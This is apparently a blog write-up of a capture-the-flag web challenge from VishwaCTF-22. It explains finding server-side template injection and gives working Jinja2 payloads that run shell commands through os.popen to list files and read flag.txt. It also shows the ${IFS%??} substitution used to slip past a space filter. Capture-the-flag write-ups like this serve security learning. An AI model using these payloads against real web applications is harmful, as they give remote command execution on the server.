VishwaCTF-22 => “Hey Buddy!” (Web)

Challenge Info

Description: Hey Buddy, Give me your name I will display your name on my website. Yes exactly, there is nothing in this website.

URL: https://h3y-buddy.vishwactf.com/

Vishwa CTF

Solution

The challenge says that when you will enter your name, it will simply display it in the site. Okay! But now thinking, what the backend would be doing when we enter the name, passing it to shell script,,,, maybe, or not. So let’s figure it out. When we enter some name, it always come in a particular format. Means it is most probably to parse it to a template. So now checking for vulnerability related to template, we have template injection. Since the tasks are performed on the backend, it could be more specifically SSTI (Server-Side Template Injection). So testing for SSTI with the basic payload: {{7*7}}. We are expected to get 49. So,

And here it worked. So now automating it, I used tplmap, which is a SSTI injection tool, but it doesn’t seemed to work for me. So I downloaded the payload list for SSTI from GitHub and sent it to the burp intruder. Many payloads gave me 500 error, do I just filtered all 3xx, 4xx, and 5xx payloads, so I found a few:-

But the most useful one I found was:-

{{config.__class__.__init__.__globals__[‘os’].popen(‘ls’).read()}}

This executed “ls” on filesystem and it showed me the files. So the one I was interested in was flag.txt. So, I tried running command “cat flag.txt”, but I got a 500 error. So i replaced the space (“ ”) with “${IFS%??}”. So the final payload was:-

{{config.__class__.__init__.__globals__[‘os’].popen(‘cat${IFS%??}flag.txt’).read()}}

This finally gave me the flag:-

Takeaways

  • You can replace the space (“ ”) with “${IFS%??}” in payload if it doesn’t works
  • Try different payloads for one attack if one doesn’t works.

Get more VishwaCTF-22 writeups here

--

--

--

<broken code>

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The cyberthreat name game: Good or bad?

Elastic Detection Rule Development: Suspicious Exchange Mailbox Right Delegation

Announcement that LBank Completed the Reward Distribution of ELAMA Time- Limited Q&A Airdrop

Windows Kernel Exploitation

It’s Aleo!

Email content spoofing at IKEA.com

Manta Network is revolution in Web 3.0 confidential?

RIVETZ: Decentralised and Mobile Cyber-Security Token

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Shriyans Sudhi

Shriyans Sudhi

<broken code>

More from Medium

vulnerable API (vAPI) writeup

C.O.R.S. (Cross Site Resource Sharing)

Upload Vulnerabilities

Authentication Bypass using OTP